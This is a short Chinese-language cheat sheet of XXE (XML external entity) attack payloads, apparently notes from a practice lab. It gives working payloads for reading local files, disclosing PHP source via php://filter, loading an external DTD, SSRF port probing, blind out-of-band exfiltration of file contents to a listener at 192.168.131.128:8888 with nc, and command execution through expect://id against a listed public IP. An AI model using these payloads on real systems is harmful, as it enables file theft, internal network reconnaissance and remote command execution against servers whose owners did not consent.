1.攻击测试
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "a" > ]>
<foo>&xxe;</foo>
2.查看文件
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///E:/phpStudy/PHPTutorial/WWW/flag/flag.txt" > ]>
<foo>&xxe;</foo>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]>
<foo>&xxe;</foo>
3.查看源码
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=E:/phpStudy/PHPTutorial/WWW//1.php" > ]>
<foo>&xxe;</foo>
去base64解码
4.DTD外部调用
<!ENTITY evil SYSTEM "file:///c:/windows/system.ini" >
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://172.16.3.243/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>
5.探测内网存活主机与开放端口
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY rabbit SYSTEM "http://127.0.0.1:80" > ]> <x>&rabbit;</x>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY rabbit SYSTEM "mysql://127.0.0.1:3306" > ]> <x>&rabbit;</x>6.无回显探测
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://192.168.131.128:8888/?%file;'>">%start;虚拟机ip
nc -lvvp 8888 //开启监听
<?xml version="1.0"?> <!DOCTYPE message [ <!ENTITY % remote SYSTEM "http://172.16.3.243/123.dtd"> <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///E:/phpStudy/PHPTutorial/WWW/flag/flag.txt"> %remote; %send;]>
得到base64编码去解码
7.命令执行
IP:106.52.18.106:8765/vul/xxe/xxe_1.php
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>